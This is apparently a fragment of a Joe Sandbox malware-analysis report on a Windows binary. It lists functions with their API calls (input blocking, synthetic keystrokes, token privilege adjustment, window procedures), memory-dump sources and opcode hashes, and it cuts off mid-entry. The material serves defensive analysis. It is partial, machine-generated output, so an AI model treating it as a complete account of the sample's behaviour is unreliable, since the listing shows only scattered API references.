                                                                                                                                        Function 007AFD47 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007AFD71
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 007AFDA1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                        • Opcode ID: 9b4901da5273aeed12dc2e30c4ce3d95a07b314be9a0d3fc88f1978e558f01c3
                                                                                                                                        • Instruction ID: b9d68e2f7cb7bb2ba222c72bbc0968371f7649fb5d884192b669be87b4aa1c91
                                                                                                                                        • Opcode Fuzzy Hash: 9b4901da5273aeed12dc2e30c4ce3d95a07b314be9a0d3fc88f1978e558f01c3
                                                                                                                                        • Instruction Fuzzy Hash: D111C831610204DFD710EF28C849A2AB7E4FF89324F00861DF9A9DB391DB38ED118B85
                                                                                                                                        Function 007CF0A1 Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,007DF352,?,?,?), ref: 007CF115
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007CF0FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1273190321-0
                                                                                                                                        • Opcode ID: 90230fdb481aef4c69fecf93ae2488a2f612533098d741f21f483ef2b1cdc126
                                                                                                                                        • Instruction ID: a78c041142fa6b374514276a0f634c7507eb64dc195fe7c1c2af1ba326355f5a
                                                                                                                                        • Opcode Fuzzy Hash: 90230fdb481aef4c69fecf93ae2488a2f612533098d741f21f483ef2b1cdc126
                                                                                                                                        • Instruction Fuzzy Hash: DE01B131200208EBDB219F18DC89F6A7BA7FB85364F28812CF9150B2A1C7359C12DB50
                                                                                                                                        Function 007CF45A Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CF47D
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,007DF42E,?,?,?,?,?), ref: 007CF4A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClientDialogNtdllProc_Screen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3420055661-0
                                                                                                                                        • Opcode ID: 1b8b319ac776eba6a92b0f0912572f4c0f1d76a49445f3b4562f2b2d7064f094
                                                                                                                                        • Instruction ID: ed8fb09d9e24a567ef53ccde4d7798452dc2b79a552f50a374b333da38ef5c37
                                                                                                                                        • Opcode Fuzzy Hash: 1b8b319ac776eba6a92b0f0912572f4c0f1d76a49445f3b4562f2b2d7064f094
                                                                                                                                        • Instruction Fuzzy Hash: 7DF06732400118FFEF048F84DC48AAE7BB8FF08350F10802AF902A6060D3B9AA11AB64
                                                                                                                                        Function 007AD712 Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007BC2E2,?,?,00000000,?), ref: 007AD73F
                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007BC2E2,?,?,00000000,?), ref: 007AD751
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                        • Opcode ID: 20902c49a27b940f4d6579946eec50f02acd824d7fe2c63d33d081bd9c0bdf35
                                                                                                                                        • Instruction ID: ae10f15ed1eefc71359ea48c0dd0b40a43433f628de253eee857c266b2a01c97
                                                                                                                                        • Opcode Fuzzy Hash: 20902c49a27b940f4d6579946eec50f02acd824d7fe2c63d33d081bd9c0bdf35
                                                                                                                                        • Instruction Fuzzy Hash: A4F0823510132DEBDB21AFA4CC8DFEA776CBF4A351F008115B916D6181D7749D40DBA4
                                                                                                                                        Function 007A4B52 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007A4B89
                                                                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 007A4B9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                        • Opcode ID: d6718495c09d8aee30654c324a970a2f50d45b79d4fdceba883ba7ff99500ed3
                                                                                                                                        • Instruction ID: 60c736baa095ba39c3ba3db52de3489856efe45c97659391b0c9382800b4590c
                                                                                                                                        • Opcode Fuzzy Hash: d6718495c09d8aee30654c324a970a2f50d45b79d4fdceba883ba7ff99500ed3
                                                                                                                                        • Instruction Fuzzy Hash: 29F0907080038DAFDB058FA0C805BBE7BB4EF04305F04C409F961A9191D3B9CA11DFA4
                                                                                                                                        Function 0079B8B0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0079B8C5
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0079B8D7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                        • Opcode ID: 04675bb3bd4a30017ce20e2352845dbf091bc8ee62d649b6a4e85c15eed96123
                                                                                                                                        • Instruction ID: 2ffbd746b41f3ac35ff04f0d36522c115ce68d43523ef1362f23e224e2239895
                                                                                                                                        • Opcode Fuzzy Hash: 04675bb3bd4a30017ce20e2352845dbf091bc8ee62d649b6a4e85c15eed96123
                                                                                                                                        • Instruction Fuzzy Hash: 72E04632000600EEEB222B60FC0CDBA7BE9EF08320B10C829F49684430CB66AC90DB50
                                                                                                                                        Function 007CF594 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 007CF59C
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,007DF3AD,?,?,?,?), ref: 007CF5C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        • Opcode ID: e6f60e7ad25bb7b908d4a53311f2db1dbdae623c6b822826c572b97b253ef7b0
                                                                                                                                        • Instruction ID: 993d7ab0bcd6e11057ea9b5393668991dbfcc566e53bd21324d7c4f6f14607b5
                                                                                                                                        • Opcode Fuzzy Hash: e6f60e7ad25bb7b908d4a53311f2db1dbdae623c6b822826c572b97b253ef7b0
                                                                                                                                        • Instruction Fuzzy Hash: 2AE08C30104258BBEB240F09EC0AFB93B19FB08B90F10852AFA16880E0D7B888A0D664
                                                                                                                                        Function 00788E3C Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0076125D,00787A43,00760F35,?,?,00000001), ref: 00788E41
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00788E4A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 05a6c039fc4eae961ee935179514ef1ac832fdbddbac2d07e723475aa2b484ef
                                                                                                                                        • Instruction ID: 547956a0d01e23fecf26d937163d92f0714b59e7e76d35f9686ea49cea9b51a3
                                                                                                                                        • Opcode Fuzzy Hash: 05a6c039fc4eae961ee935179514ef1ac832fdbddbac2d07e723475aa2b484ef
                                                                                                                                        • Instruction Fuzzy Hash: 74B09271045A48EBEA102BA1EC49B8A3F68EB0EA62F008010F61D4C4608B6758508A9A
                                                                                                                                        Function 0079113E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: c1e809d3add22fd96667add85d398d212845eeb9f2419fa4d8dc1fcef77b3871
                                                                                                                                        • Instruction ID: 1282b964645868ddf0ea923f9f82e4b107d8f4dd363d461a0d714c50c8df90a4
                                                                                                                                        • Opcode Fuzzy Hash: c1e809d3add22fd96667add85d398d212845eeb9f2419fa4d8dc1fcef77b3871
                                                                                                                                        • Instruction Fuzzy Hash: B6B1F120D2AF414DD6239639D831336BB5CAFBB2D5F92D71BFC1A70D62EB2585838184
                                                                                                                                        Function 007D02AA Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 007D0352
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        • Opcode ID: 95a12f669e4c3bde2b2738bab512dd4b6118cf846d452fdf6752799c90ee3c0c
                                                                                                                                        • Instruction ID: 1ae6a8b5a128328151887a37c1bf3111f7a680793a6018c645f317712ed10d05
                                                                                                                                        • Opcode Fuzzy Hash: 95a12f669e4c3bde2b2738bab512dd4b6118cf846d452fdf6752799c90ee3c0c
                                                                                                                                        • Instruction Fuzzy Hash: C811E731204255FBFB345B288C4DF7D3B24E745760F24832EF9115A2E2CAA89D01D2E5
                                                                                                                                        Function 007CE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 007CE7AF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CallLongProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4084987330-0
                                                                                                                                        • Opcode ID: c88b39669016fb78db6160e22884d80843799e574cca8762eb972ededc2da399
                                                                                                                                        • Instruction ID: ddd7e37d7ee68ffd8d51c16edd63fa81afedd15d25b79f2daa958d6935a3d2d7
                                                                                                                                        • Opcode Fuzzy Hash: c88b39669016fb78db6160e22884d80843799e574cca8762eb972ededc2da399
                                                                                                                                        • Instruction Fuzzy Hash: 86F0FF3510010CEFCF159F94EC94E793BA6FB08360B14852CFD659A6A1C7369D71EB50
                                                                                                                                        Function 007CEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B736: GetCursorPos.USER32(000000FF), ref: 0077B749
                                                                                                                                          • Part of subcall function 0077B736: ScreenToClient.USER32(00000000,000000FF), ref: 0077B766
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000001), ref: 0077B78B
                                                                                                                                          • Part of subcall function 0077B736: GetAsyncKeyState.USER32(00000002), ref: 0077B799
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,007DF417,?,?,?,?,?,00000001,?), ref: 007CEA9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2356834413-0
                                                                                                                                        • Opcode ID: 204f94962355677c1c0675c84f4f3e90a9358dda7b0ef20cf6cc10141e393691
                                                                                                                                        • Instruction ID: 3768ca54c3c07feaab900bfeb1fe27481841afe7ff18691434cea5491441f5b6
                                                                                                                                        • Opcode Fuzzy Hash: 204f94962355677c1c0675c84f4f3e90a9358dda7b0ef20cf6cc10141e393691
                                                                                                                                        • Instruction Fuzzy Hash: 9AF08C31200229FBDF14AF19DC4AEBE3B61FB00790F008019F91A5A1A1D77A98A1DBD1
                                                                                                                                        Function 0077B7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0077AF40,?,?,?,?,?), ref: 0077B83B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        • Opcode ID: 0c52b0ae70536ce798c866d1f45003cfee06636041d858a8b288338df7b47cb4
                                                                                                                                        • Instruction ID: 7b117297d78d592e36ea4729b3fd7a0a68e70f9e35d1675a710d614c0ae6407c
                                                                                                                                        • Opcode Fuzzy Hash: 0c52b0ae70536ce798c866d1f45003cfee06636041d858a8b288338df7b47cb4
                                                                                                                                        • Instruction Fuzzy Hash: 99F05E30600209EFDF289F14D898A793BA6FB553A0F20C239F9568B2A0D775D861DB90
                                                                                                                                        Function 007B703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • BlockInput.USER32(00000001), ref: 007B7057
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
